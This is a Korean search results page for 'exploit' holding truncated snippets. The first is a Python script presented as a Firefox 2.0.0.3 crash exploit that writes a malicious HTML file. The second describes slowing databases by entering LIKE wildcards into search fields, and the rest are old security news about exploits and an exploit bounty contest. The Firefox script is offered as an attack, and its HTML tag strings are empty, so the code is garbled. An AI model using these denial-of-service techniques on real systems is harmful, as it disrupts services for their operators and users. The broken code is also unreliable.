exploit 검색 결과, 9
Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit
#usr/bin/python tagHtml = "" tagHtmlC = "" tagHead = "" tagTitle = "" tagTitleC = "" buff= "" * 160 boom = tagHtml + buff + tagHead + tagTitle + tagTitleC + tagHeadC + tagHtmlC try: fileOut = open('ff_dos.html','w') fileOut.write(boom) fileOut.close() print "nFILE ff_dos.html CREATED!n'NJOY IT...n" except: print "nUNABLE TO CREATE FILE ff_dos.html!n"Search Query Denial Of Service
One can attack a database by it's own logical behaviour like prevent it to work efficiently. A database uses indices to speed up searches with a normal a-z LIKE search. But one can break out that logical routine by adding special characters into the search field by using: % _ and combinations of it: %_abc _%abc etc. The bigger the table the slower it becomes. The value in the LIKE operator is ne..New Java exploits brewing
Attackers have released exploit code targeting two previously patched flaws in Sun Microsystems' Java Runtime Environment (JRE) and Java Software Development Kit (SDK). The flaws could allow an attacker to remotely execute code on a Windows, Linux or Solaris system. Sun issued patches for both vulnerabilities in December. The JRE component allows JavaScript code to be executed on most operating ..Vista contest offers cash for exploits
A US security firm is offering up to US$72,000 in bounties for the development of working exploits for Microsoft's Windows Vista and Internet Explorer 7. IDefense has launched its latest Quarterly Vulnerability Challenge which offers researchers up to US$8,000 for reporting a working vulnerability allowing for remote code execution. An additional US$2,000 to US$4,000 is available if the research..New Mac OS X exploit disclosed
Security researchers have posted exploit code for a Mac OS X vulnerability that runs through Apple's Safari web browser. A successful exploit could allow for remote code execution, according to the original posting of the vulnerability. Security firm Secunia gave the vulnerability its second-highest rating of 'highly critical'. The vulnerability was disclosed by a security researcher known only ..